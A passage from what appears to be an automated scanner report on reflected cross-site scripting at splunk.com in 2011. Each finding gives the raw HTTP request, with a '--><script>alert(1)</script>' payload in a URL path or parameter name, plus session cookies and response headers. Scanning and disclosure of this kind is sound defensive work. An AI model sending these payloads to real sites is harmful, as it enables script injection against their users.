GET /page383a8--><script>alert(1)</script>74d4e36369d/company_news HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:12:44 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:42:44 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:42:44 GMT; path=/ ETag: 7b7752b2f3e8d75b49e9f04af08a61991296943964 Last-Modified: Sat, 05 Feb 2011 22:12:44 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18339
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload fe016--><script>alert(1)</script>02751ea29ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/company_newsfe016--><script>alert(1)</script>02751ea29ab HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:12 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18232
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.429. http://www.splunk.com/page/company_news [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/page/company_news
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 60507--><script>alert(1)</script>01f40883de9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/company_news?60507--><script>alert(1)</script>01f40883de9=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:02 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 7f71e5eaea1054d3cef71548dbdb7d571296943923 Last-Modified: Sat, 05 Feb 2011 22:12:03 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 53470
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload ae83c--><script>alert(1)</script>c2862584a5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pageae83c--><script>alert(1)</script>c2862584a5c/deployments HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:12:46 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:42:46 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:42:46 GMT; path=/ ETag: 925be999e0ee197c863067b046f053771296943966 Last-Modified: Sat, 05 Feb 2011 22:12:46 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 65753--><script>alert(1)</script>185a0eda07b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/deployments65753--><script>alert(1)</script>185a0eda07b HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:13 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload b0685--><script>alert(1)</script>efb9c6194d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pageb0685--><script>alert(1)</script>efb9c6194d9/events HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:13:11 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:43:11 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:43:11 GMT; path=/ ETag: 2f01dad37b0557e806956818a52abb291296943991 Last-Modified: Sat, 05 Feb 2011 22:13:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18315
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload d1458--><script>alert(1)</script>7fcc47b649c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/eventsd1458--><script>alert(1)</script>7fcc47b649c HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:45 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18196
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.434. http://www.splunk.com/page/events [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/page/events
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 14917--><script>alert(1)</script>2af0474b4f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/events?14917--><script>alert(1)</script>2af0474b4f1=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:31 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 2103cb1d26b8a9d2bc9082aecd877a281296943954 Last-Modified: Sat, 05 Feb 2011 22:12:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34882
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 28e76--><script>alert(1)</script>e6d35decb65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page28e76--><script>alert(1)</script>e6d35decb65/portal_admin HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:12:39 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:42:39 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:42:39 GMT; path=/ ETag: 487008de879a47b141c465fe14cdda001296943959 Last-Modified: Sat, 05 Feb 2011 22:12:39 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18339
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload e13c8--><script>alert(1)</script>480a721c753 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/portal_admine13c8--><script>alert(1)</script>480a721c753 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:08 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18232
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 799d3--><script>alert(1)</script>ba4082ebc63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page799d3--><script>alert(1)</script>ba4082ebc63/previous_releases HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:14:06 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:44:06 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:44:06 GMT; path=/ ETag: 9b6993c05b5df44787b13ea3a3b84cb31296944047 Last-Modified: Sat, 05 Feb 2011 22:14:07 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18359
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 88d0b--><script>alert(1)</script>8b1623a164f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
